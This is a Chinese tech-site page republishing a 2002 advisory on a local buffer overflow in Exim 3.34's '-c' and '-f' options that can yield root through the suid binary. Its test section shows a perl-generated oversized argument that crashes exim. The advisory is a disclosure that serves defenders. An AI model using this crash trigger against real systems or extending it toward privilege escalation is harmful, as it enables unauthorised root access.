+设为首页   +添加到收藏夹
首页·栏目 >  软件资讯  |  技术专题  |  编程技术  |  数据库  |  服务器  |  项目方案  |  网站架构  |  应用指南  |  技术教程  |  项目开发
    当前位置:首页 » 服务器技术
开发技术指南» 文章正文
    引言: 信息提供: 安全公告(或线索)提供热线:51c
 

 

 ·zkfingerd syslog远程格式串溢出漏洞    »显示摘要«
    摘要: 信息提供: 安全公告(或线索)提供热线:51cto.editor@gmail.com 漏洞类别: 远程格式串溢出漏洞 攻击类型: 远程攻击 发布日期: 2002-12-30 更新日期: 2002-12-30 受影响系统: zkfingerd zkfingerd 0.9.1 安全系统: 无 漏洞报......
 ·w-agora editform.php远程php文件包含漏洞    »显示摘要«
    摘要: 信息提供: 安全公告(或线索)提供热线:51cto.editor@gmail.com 漏洞类别: 远程php文件包含漏洞 攻击类型: 远程攻击 发布日期: 2002-12-22 更新日期: 2002-12-30 受影响系统: w-agora w-agora 安全系统: 无 漏洞报告人: xat......


Exim命令行配置文件参数缓冲区溢出漏洞

【程序编程相关:PHP DLOpen任意Web服务内存泄

【推荐阅读:OpenSLP初始化脚本以不安全方式处理

信息提供: 【扩展信息:Autorespond远程缓冲区溢出漏洞

安全公告(或线索)提供热线:51cto.editor@gmail.com

漏洞类别:

缓冲区溢出漏洞

攻击类型:

本地攻击

发布日期:

2002-02-13

更新日期:

2002-02-13

受影响系统:

university of cambridge exim 3.34

安全系统:

漏洞报告人:

ehud tenenbaum

漏洞描述:

bugtraq  id: 4096

exim是一个开放源代码的免费邮件传送软件,由剑桥大学发布与维护.它可运行于unix/linux类操作系统之下.

exim实现上存在一个缓冲区溢出漏洞,可以使本地攻击者获取root权限.

当exim以几种组合的参数标记被运行时,可能发生缓冲区溢出,其中必须的一个参数标记是指定配置文件的“-c“标记,一般情况下要有32768 字节长度的“-c“参数,还需要有其它的参数比如“-f“,它后面所跟的参数长度必须有32700字节.由于在某些系统下,它被设置了suid root属性,本地攻击者可能获取root权限.

测试方法:

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.使用者风险自负!

首先让我们看看这个文件:

[2xs:root:~] ls -la /usr/exim/bin/exim

-rws--x--x 1 root root 2061186 oct 23 12:56

/usr/exim/bin/exim*

[2xs:root:~]

suid身份

[2xs:w00p:/root] id

uid=1001(w00p) gid=100(users) groups=100(users)

[2xs:w00p:/root] /usr/exim/bin/exim -f `perl -e print "a" x 32770` -c

`perl -e print "a" x 32768`

segmentation fault

[2xs:w00p:/root]


...   下一页
 ·real networks helix universal server rtsp transport字段远程缓冲区溢出漏洞    »显示摘要«
    摘要: 信息提供: 安全公告(或线索)提供热线:51cto.editor@gmail.com 漏洞类别: 远程缓冲区溢出漏洞 攻击类型: 远程攻击 发布日期: 2002-12-20 更新日期: 2002-12-27 受影响系统: real networks helix universal server 9.0 安全系统......
» 本期热门文章:

©2000-2007 All Rights Reserved. 最佳浏览:1024X768 MSIE